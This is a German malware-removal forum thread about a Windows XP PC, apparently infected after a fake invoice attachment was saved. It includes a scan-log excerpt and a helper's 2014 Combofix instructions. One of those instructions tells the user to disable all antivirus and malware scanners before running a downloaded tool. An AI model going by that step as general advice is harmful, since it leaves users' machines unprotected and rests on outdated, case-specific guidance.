Task: C:\WINDOWS\Tasks\Ende des Supports für Microsoft Windows XP – Monatliche Benachrichtigung.job => C:\WINDOWS\system32\xp_eos.exe
Task: C:\WINDOWS\Tasks\User_Feed_Synchronization-{C186E9D0-3AC4-4FDE-B049-0A85B9D00A62}.job => C:\WINDOWS\system32\msfeedssync.exe

==================== Loaded Modules (whitelisted) =============

2014-03-28 10:35 - 2014-03-28 10:35 - 00093696 _____ () C:\Programme\FileZilla FTP Client\fzshellext.dll
2014-10-22 15:12 - 2014-10-22 15:12 - 00245760 _____ () C:\Programme\Avira\My Avira\System.ComponentModel.Composition.dll
2004-11-17 01:31 - 2008-04-14 06:52 - 00014336 _____ () C:\WINDOWS\system32\msdmo.dll
2014-06-15 17:01 - 2014-06-15 17:02 - 03022960 _____ () C:\Programme\Mozilla Thunderbird\mozjs.dll
2014-06-15 17:01 - 2014-06-15 17:02 - 00158832 _____ () C:\Programme\Mozilla Thunderbird\NSLDAP32V60.dll
2014-06-15 17:01 - 2014-06-15 17:02 - 00023152 _____ () C:\Programme\Mozilla Thunderbird\NSLDAPPR32V60.dll
2014-11-11 18:27 - 2014-11-07 01:09 - 03649648 _____ () C:\Programme\Mozilla Firefox\mozjs.dll
2014-11-12 11:14 - 2014-11-12 11:14 - 16840880 _____ () C:\WINDOWS\system32\Macromed\Flash\NPSWF32_15_0_0_223.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\WINDOWS:E93A646CAC9BB971
AlternateDataStreams: C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\TEMP:DFC5A2B2
AlternateDataStreams: C:\Dokumente und Einstellungen\USER\Eigene Dateien\IMG00001.JPG:SummaryInformation
AlternateDataStreams: C:\Dokumente und Einstellungen\USER\Eigene Dateien\IMG00001.JPG:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
AlternateDataStreams: C:\Dokumente und Einstellungen\USER\Eigene Dateien\Kirche Bilder Staub 191.JPG:SummaryInformation
AlternateDataStreams: C:\Dokumente und Einstellungen\USER\Eigene Dateien\Kirche Bilder Staub 191.JPG:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Programme\Gemeinsame Dateien\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: updateMgr => "C:\Programme\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe" AcRdB7_0_9
MSCONFIG\startupreg: WinVNC => "C:\Programme\TightVNC\WinVNC.exe" -servicehelper

========================= Accounts: ==========================

Administrator (S-1-5-21-2696325089-3607014519-4140266021-500 - Administrator - Enabled)
ASPNET (S-1-5-21-2696325089-3607014519-4140266021-1004 - Limited - Enabled)
Gast (S-1-5-21-2696325089-3607014519-4140266021-501 - Limited - Enabled)
Hilfeassistent (S-1-5-21-2696325089-3607014519-4140266021-1006 - Limited - Disabled)
USER (S-1-5-21-2696325089-3607014519-4140266021-1007 - Administrator - Enabled) => %SystemDrive%\Dokumente und Einstellungen\USER
SUPPORT_388945a0 (S-1-5-21-2696325089-3607014519-4140266021-1002 - Limited - Disabled)

==================== Faulty Device Manager Devices =============

Name: Intel(R) PRO/Wireless 2200BG Network Connection
Description: Intel(R) PRO/Wireless 2200BG Network Connection
Class Guid: {4D36E972-E325-11CE-BFC1-08002BE10318}
Manufacturer: Intel(R) Corporation
Service: w22n51
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Event log errors: =========================

Application errors:
==================
Error: (11/12/2014 09:43:18 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlgeschlagene Anwendung jusched.exe, Version 2.1.9.4, fehlgeschlagenes Modul user32.dll, Version 5.1.2600.5512, Fehleradresse 0x000187f1.
Das medienspezifische Ereignis für [jusched.exe!ws!] wird verarbeitet.

Error: (11/12/2014 09:36:50 AM) (Source: Microsoft Fax) (EventID: 32045) (User: )
Description: Fehler beim Initialisieren durch den Faxdienst, da die TAPI-Geräte nicht initialisiert werden konnten.


Stellen Sie sicher, dass das Modem installiert und korrekt konfiguriert ist.
Win32-Fehlercode: 31.
Dieser Fehlercode gibt die Ursache für den Fehler an.

Error: (11/12/2014 09:31:56 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlgeschlagene Anwendung jusched.exe, Version 2.1.9.4, fehlgeschlagenes Modul user32.dll, Version 5.1.2600.5512, Fehleradresse 0x000187f1.
Das medienspezifische Ereignis für [jusched.exe!ws!] wird verarbeitet.

Error: (11/12/2014 09:26:51 AM) (Source: Microsoft Fax) (EventID: 32045) (User: )
Description: Fehler beim Initialisieren durch den Faxdienst, da die TAPI-Geräte nicht initialisiert werden konnten.


Stellen Sie sicher, dass das Modem installiert und korrekt konfiguriert ist.
Win32-Fehlercode: 31.
Dieser Fehlercode gibt die Ursache für den Fehler an.

Error: (11/11/2014 07:18:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlgeschlagene Anwendung 1c.tmp, Version 8.10.3560.65011, fehlgeschlagenes Modul 1c.tmp, Version 8.10.3560.65011, Fehleradresse 0x000019ee.
Das medienspezifische Ereignis für [1c.tmp!ws!] wird verarbeitet.

Error: (11/11/2014 06:40:32 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlgeschlagene Anwendung jusched.exe, Version 2.1.9.4, fehlgeschlagenes Modul user32.dll, Version 5.1.2600.5512, Fehleradresse 0x000187f1.
Das medienspezifische Ereignis für [jusched.exe!ws!] wird verarbeitet.

Error: (11/11/2014 06:35:40 PM) (Source: Microsoft Fax) (EventID: 32045) (User: )
Description: Fehler beim Initialisieren durch den Faxdienst, da die TAPI-Geräte nicht initialisiert werden konnten.


Stellen Sie sicher, dass das Modem installiert und korrekt konfiguriert ist.
Win32-Fehlercode: 31.
Dieser Fehlercode gibt die Ursache für den Fehler an.

Error: (11/11/2014 06:26:09 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlgeschlagene Anwendung jusched.exe, Version 2.1.9.4, fehlgeschlagenes Modul user32.dll, Version 5.1.2600.5512, Fehleradresse 0x000187f1.
Das medienspezifische Ereignis für [jusched.exe!ws!] wird verarbeitet.

Error: (11/11/2014 06:20:56 PM) (Source: Microsoft Fax) (EventID: 32045) (User: )
Description: Fehler beim Initialisieren durch den Faxdienst, da die TAPI-Geräte nicht initialisiert werden konnten.


Stellen Sie sicher, dass das Modem installiert und korrekt konfiguriert ist.
Win32-Fehlercode: 31.
Dieser Fehlercode gibt die Ursache für den Fehler an.

Error: (11/11/2014 06:16:15 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Stillstehende Anwendung rundll32.exe, Version 5.1.2600.5512, Stillstandmodul hungapp, Version 0.0.0.0, Stillstandadresse 0x00000000.


System errors:
=============
Error: (11/12/2014 09:50:54 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Windows Presentation Foundation Font Cache 3.0.0.0" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%1053

Error: (11/12/2014 09:50:54 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Zeitüberschreitung (30000 ms) beim Verbindungsversuch mit Dienst Windows Presentation Foundation Font Cache 3.0.0.0.

Error: (11/12/2014 09:47:53 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "IMAPI-CD-Brenn-COM-Dienste" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%1053

Error: (11/12/2014 09:47:52 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Zeitüberschreitung (30000 ms) beim Verbindungsversuch mit Dienst IMAPI-CD-Brenn-COM-Dienste.

Error: (11/12/2014 09:47:33 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: Der Dienst "Avira Echtzeit-Scanner" wurde nicht ordnungsgemäß gestartet.

Error: (11/12/2014 09:37:03 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "VNC Server" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%3

Error: (11/12/2014 09:27:01 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "VNC Server" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%3

Error: (11/11/2014 06:48:19 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Windows Presentation Foundation Font Cache 3.0.0.0" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%1053

Error: (11/11/2014 06:48:18 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Zeitüberschreitung (30000 ms) beim Verbindungsversuch mit Dienst Windows Presentation Foundation Font Cache 3.0.0.0.

Error: (11/11/2014 06:35:30 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "VNC Server" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%3


Microsoft Office Sessions:
=========================
Error: (11/12/2014 09:43:18 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: jusched.exe2.1.9.4user32.dll5.1.2600.5512000187f1

Error: (11/12/2014 09:36:50 AM) (Source: Microsoft Fax) (EventID: 32045) (User: )
Description: 31

Error: (11/12/2014 09:31:56 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: jusched.exe2.1.9.4user32.dll5.1.2600.5512000187f1

Error: (11/12/2014 09:26:51 AM) (Source: Microsoft Fax) (EventID: 32045) (User: )
Description: 31

Error: (11/11/2014 07:18:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: 1c.tmp8.10.3560.650111c.tmp8.10.3560.65011000019ee

Error: (11/11/2014 06:40:32 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: jusched.exe2.1.9.4user32.dll5.1.2600.5512000187f1

Error: (11/11/2014 06:35:40 PM) (Source: Microsoft Fax) (EventID: 32045) (User: )
Description: 31

Error: (11/11/2014 06:26:09 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: jusched.exe2.1.9.4user32.dll5.1.2600.5512000187f1

Error: (11/11/2014 06:20:56 PM) (Source: Microsoft Fax) (EventID: 32045) (User: )
Description: 31

Error: (11/11/2014 06:16:15 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: rundll32.exe5.1.2600.5512hungapp0.0.0.000000000


==================== Memory info =========================== 

Processor:  Intel(R) Pentium(R) M processor 1.50GHz
Percentage of memory in use: 79%
Total physical RAM: 495.36 MB
Available physical RAM: 102.84 MB
Total Pagefile: 1190.91 MB
Available Pagefile: 215.97 MB
Total Virtual: 2047.88 MB
Available Virtual: 1927.95 MB

==================== Drives ================================

Drive c: (System) (Fixed) (Total:74.53 GB) (Free:39.69 GB) NTFS ==>[Drive with boot components (Windows XP)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows XP) (Size: 74.5 GB) (Disk ID: 43FA43FA)
Partition 1: (Active) - (Size=74.5 GB) - (Type=07 NTFS)

==================== End Of Log ============================

--- --- ---

update!

update

cosinus · 12.11.2014, 13:56

Zitat:

C:\Dokumente und Einstellungen\USER\Eigene Dateien\Downloads\2014_11rechnung_K4768955881.zip

Du kannst deinem Vaddi schonmal ausrichten, dass man Mist-E-Mails gleich löscht und nur weil im Betreff irgendwas mit Rechnung oder Vertrag steht, nicht gleich den Anhang abspeichert oder ausführt. Virenscanner helfen gegen Mails mit neuen virulenten Dateianhängen sogut wie garnicht.

In Zukunft: Gerade bei Onlinebanking mal überlegen, ob man unbedingt auf die Virenschleuder Windows setzeb muss. Dieses jetzige Altgerät mit WinXP könntest du zB plattmachen und mit einem Lubuntu austatten, damit wäre browserbasiertes Onlinebanking deutlich sicherer als unter Windows.

Wann hattet ihr vor, dass Gerät zu ersetzen bzw neu zu installieren? In diesem Zustand solltet ihr damit kein Onlinebanking mehr machen, es wurde auch schon vor Monaten dazu aufgerufen, mit WinXP-Rechnern nichtmal mehr zu surfen.

myzinsky · 12.11.2014, 14:02

hey,

ja das ist mir alles bekannt, ich wollte meinem Vater einen Mac-Mini holen, er brauch zwinged Word und Excel und deshalb fällt Linux raus, was natürlich auch meine erste Wahl gewesen wäre. Vor Weihnachten komme ich aus Entfernungsgründen leider nicht mehr zu ihm.

Ich habe aber Zugriff über Teamviewer. Gibt es eine Möglichkeit, wie ich dem Wurm auf die Schliche kommen kann? Scheint so, als ob er tief im System sitzt?

Ich kenne mich nur gut mit Linux und mit Mac aus, Windows hab ich relativ wenig know how.

Grüße
myzinsky

cosinus · 12.11.2014, 14:37

Notfalls könnte man Office über wine unter Linux installieren, aber naja, schön ist das nicht...ist immer ärgerlich wenn man so sehr von Microsoft abhängig sein und MS-Office verwenden muss

Dann bitte jetzt Combofix ausführen:

Scan mit Combofix

WARNUNG an die MITLESER:
Combofix sollte ausschließlich ausgeführt werden, wenn dies von einem Teammitglied angewiesen wurde!

Downloade dir bitte Combofix vom folgenden Downloadspiegel: Link

WICHTIG: Speichere Combofix auf deinem Desktop

Deaktiviere bitte alle deine Antivirensoftware sowie Malware/Spyware Scanner. Diese können Combofix bei der Arbeit stören.

Starte die Combofix.exe und folge den Anweisungen auf dem Bildschirm.

Combofix wird überprüfen, ob die Microsoft Windows Wiederherstellungskonsole installiert ist.
Ist diese nicht installiert, erlaube Combofix diese herunter zu laden und zu installieren. Folge dazu einfach den Anweisungen und aktzeptiere die Endbenutzer-Lizenz.
Bei heutiger Malware ist dies sehr empfehlenswert, da diese uns eine Möglichkeit bietet, dein System zu reparieren, falls etwas schief geht.
Bestätige die Information, dass die Wiederherstellungskonsole installiert wurde mit Ja.
Hinweis: Ist diese bereits installiert, wird Combofix mit der Malwareentfernung fortfahren.

Während Combofix läuft bitte nicht am Computer arbeiten, die Maus bewegen oder ins Combofixfenster klicken!

Wenn Combofix fertig ist, wird es eine Logfile erstellen.

Bitte poste die C:\Combofix.txt in deiner nächsten Antwort.

Hinweis: Solltest du nach dem Neustart folgende Fehlermeldung erhalten
Es wurde versucht, einen Registrierungsschlüssel einem ungültigen Vorgang zu unterziehen, der zum Löschen markiert wurde.
starte den Rechner einfach neu. Dies sollte das Problem beheben.

myzinsky · 12.11.2014, 14:46

Hast du eine eklärung, was dieses combofix tut?
besteht die Möglichkeit von Datenverlust?

Grüße
myzinsky

cosinus · 12.11.2014, 16:03

Combofix ist ein wichtiges Analyse- und Bereinigungstool.

Natürlich besteht immer die Möglichkeit eines Datenverlustest, völlig egal was du am Rechner machst, ob du CF ausfürhst oder nicht.

Ich dachte du hättest alle relevanten Daten eh gesichert.

12.11.2014, 16:03	#8
cosinus /// Winkelfunktion /// TB-Süch-Tiger™	Sparkasse Java Script Hack Combofix ist ein wichtiges Analyse- und Bereinigungstool. Natürlich besteht immer die Möglichkeit eines Datenverlustest, völlig egal was du am Rechner machst, ob du CF ausfürhst oder nicht. Ich dachte du hättest alle relevanten Daten eh gesichert. __________________ Logfiles bitte immer in CODE-Tags posten

Sparkasse Java Script Hack

Plagegeister aller Art und deren Bekämpfung: Sparkasse Java Script Hack